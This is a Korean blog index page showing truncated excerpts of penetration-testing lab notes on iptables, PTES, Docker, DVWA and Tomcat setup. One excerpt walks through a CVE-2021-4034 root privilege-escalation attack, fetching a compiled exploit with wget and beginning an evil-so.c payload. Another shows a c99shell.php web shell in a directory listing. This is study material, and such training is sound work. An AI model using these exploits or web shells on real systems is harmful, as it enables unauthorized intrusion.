ajh 님의 블로그

모의해킹 4일차 - NAT

>>> 체크리스트 방화벽이 무엇인가? . 미리 정의된 룰을 기반으로 패킷을 제어하는 보안시스템이다.iptables 방화벽에서 테이블, 체인, 룰이 무엇인가? . 테이블: 방화벽에서 제공하는 기능 - filter: 패킷을 필터링(허가, 거부)하는 기능을 제공하는 테이블이다. - nat: 패킷을 주소 변환(공인IP주소 -> 사설IP주소, 사설IP주소 -> 공인IP주소) 제공하는 테이블이다. . 체인: 패킷이 통과하는 경로 - filter : INPUT -> OUTPUT (로컬소켓으로 올 때 사용) - forward: FORWARD -> (내부망의 서버의 소켓으로 올 때 사용) . 룰: 각 체인에서의 세부 규칙 테이블의 종류중에서 들어오고 나가는 패킷을 필터링하는 ..

기본 정책 설정하기 기본 정책이라함은 패킷이 들어올 때 해당 체인의 설정된 룰을 검사하고 매칭되는 룰이 없다면 기본값으로 적용 되는 정책을 말한다. (INPUT으로 들어와서 OUTPUT으로 나감)좀 더 강력한 정책을 사용할려면 policy DROP으로 설정하면 된다. policy ACCEPT : 허용할 정책을 열어주고 반드시 마지막에 막아줘야 한다. 해당 룰이 없으면 모두 받아들인다policy DROP : 모두 막고 필요한 정책을 열어준다. 마지막에 모두 막아줄 필요가 없다. iptables에 접근을 할 때는 항상 기본 정책을 확인하여 서버의 연결이 끊기는 일을 방지해야 한다policy ACCEPT : iptables -F 가 가능하다. policy DROP : iptables -F 는 불가능하다. ..

해킹 시나리오 작성모의 해킹 표준안(PETS; Penetration Testing Execution Standard)모의 해킹을 수행할 때 필요한 역할과 과정들에 대한 정의를 통해 모의 해킹 수행 단계와 순서 등을 정의하고 있다. 1. 사전 계약(Pre-engagement Interactions) 사전 계약 단계에서는 고객과 함께 향후 어떤 방식과 수준의 모의 해킹을 수행할 것인지 협상한다 2. 정보 수집(Intelligence Gathering) 정보 수집 단계에서는 정보 수집에 해당되는 작업을 실시한다. 3. 위협 모델링(Threat Modeling) 위협 모델링 단계는 정보 수집 단계에서 파악된 정보를 이용해 대상 시스템에 존재하는 취약점을 본격적으로 식별하는 단계이다. 4. 취약점 분석(Vulne..

문제풀이 CVE-2021-4034 권한 상승 취약점 kali 리눅스로 mywebpage 서버에 침투하여 루트 권한 상승 공격을 시도한다 방법1. bash-4.2$ 에서 cat으로 밀어넣어 실행시킨다방법2. kali에서 ./exploit을 다 컴파일 시켜두고 wget으로 당겨온다여기서는 방법2로 공격한다 root@kali:~# cd /var/www/html/ root@kali:/var/www/html# ls apt cookie_save.txt index.html index.nginx-debian.html xssattack.php root@kali:/var/www/html# cat evil-so.c > #include > #include > #include > > void gconv() ..

새 록키 리눅스9 설치 리눅스 패키지 설치[root@docker ~]# dnf install -y vim bash-completion net-tools wget curl psmisc[root@docker ~]# cat ~/.vimrcset number " 줄 번호 표시set ai " 자동 들여쓰기set si " 스마트 들여쓰기set cindent " C 스타일 들여쓰기set shiftwidth=4 " 자동 들여쓰기 너비set tabstop=4 " 탭 간격set hlsearch " 검색어 하이라이트syntax on " 문법 강조EOF[root@docker ~]# reboot 도커 설치[root@docker ~..

디렉터리 리스팅 비활성화 하기 웹서버 . apache - 무료 웹서버 - RHEL 계열: httpd - Debian 계열: apache2 . nginx - 상용, 무료 웹서버1. mywebsite http://192.168.100.10/data/ Index of /data [ICO] Name Last modified Size Description [PARENTDIR] Parent Directory - [TXT] c99shell.php 2026-05-14 15:26 159K [root@victim ~]# cd /etc/httpd/conf[root@victim conf]# vi httpd.conf 디렉터리 인덱싱(리스팅) . 디렉터리의 리스트를 보여주는 기능이..

도커 네트워크 생성docker net cr \ > --subnet (주소) \ > --gateway (주소) \ > (네트워크 이름) 컨테이너, 이미지 설치 docker run -d --res al \> --network \> --hostname \ > --name \ > -p \ > -v /~/~/~:/~/~ \ > images 설치한 컨테이너 이미지로 추출 후 .tar파일로 저장 docker comm (원본 컨테이너) (저장할 이미지)이미지를 tar 파일로 저장한다. docker sa -o (저장할 이미지.tar) (저장할 이미지) 기존 컨테이너, 이미지 삭제 docker rm -f (컨테이너)docker rmi (이미지)docker save로 만든 파일을 docker load 명령어로 올린다. -..

DVWA는 Damn Vulnerable Web Application(DVWA) . 매우 취약하도록 설계된 PHP/MySQL 웹 애플리케이션이다. . 주요 목적은 보안 전문가가 안전하고 합법적인 환경에서 기술과 도구를 테스트할 수 있는 리소스 역할을 하는 것이다. . 웹 개발자가 웹 애플리케이션을 보호하는 방법을 이해하도록 돕고 학생과 교사가 교실 환경에서 웹 애플리케이션 보안을 탐구할 수 있는 교육 플랫폼을 제공하는 것을 목표로 한다. . DVWA는 간단하고 명확한 인터페이스를 통해 다양한 난이도의 일반적인 웹 취약성을 제공한다. . 이 소프트웨어에는 사용자가 가능한 한 많은 보안 문제를 식별하도록 장려하기 위해 알려진 취약성과 알려지지 않은 취약성이 모두 포함되..

tomcat manager 설정[root@docker ~]# docker exec -it tomcat9.0 bashroot@1806de65757a:/usr/local/tomcat# apt update root@1806de65757a:/usr/local/tomcat# apt -y install vimroot@1806de65757a:/usr/local/tomcat# vi conf/tomcat-users.xml~~~ ~~~ " roles="role1"/> --> root@1806de65757a:/usr/local/tomcat# cp -r /usr/local/tomcat/webapps.dist/manager /usr/local/tomcat/webapps/ manager는 기본적으..

Centos7 도커 설치 1. 필요한 패키지 설치 [root@victim ~]# yum -y install yum-utils device-mapper-persistent-data lvm2 2. Docker CE 저장소 추가 [root@victim ~]# yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo3. Docker CE 설치 CentOS 7에서는 Docker CE 를 설치한다.[root@victim ~]# vi /etc/yum.repos.d/CentOS-Vault.repo# C7.9.2009[C7.9.2009-base]name=CentOS-7.9.2009 - Basebaseurl=http://vau..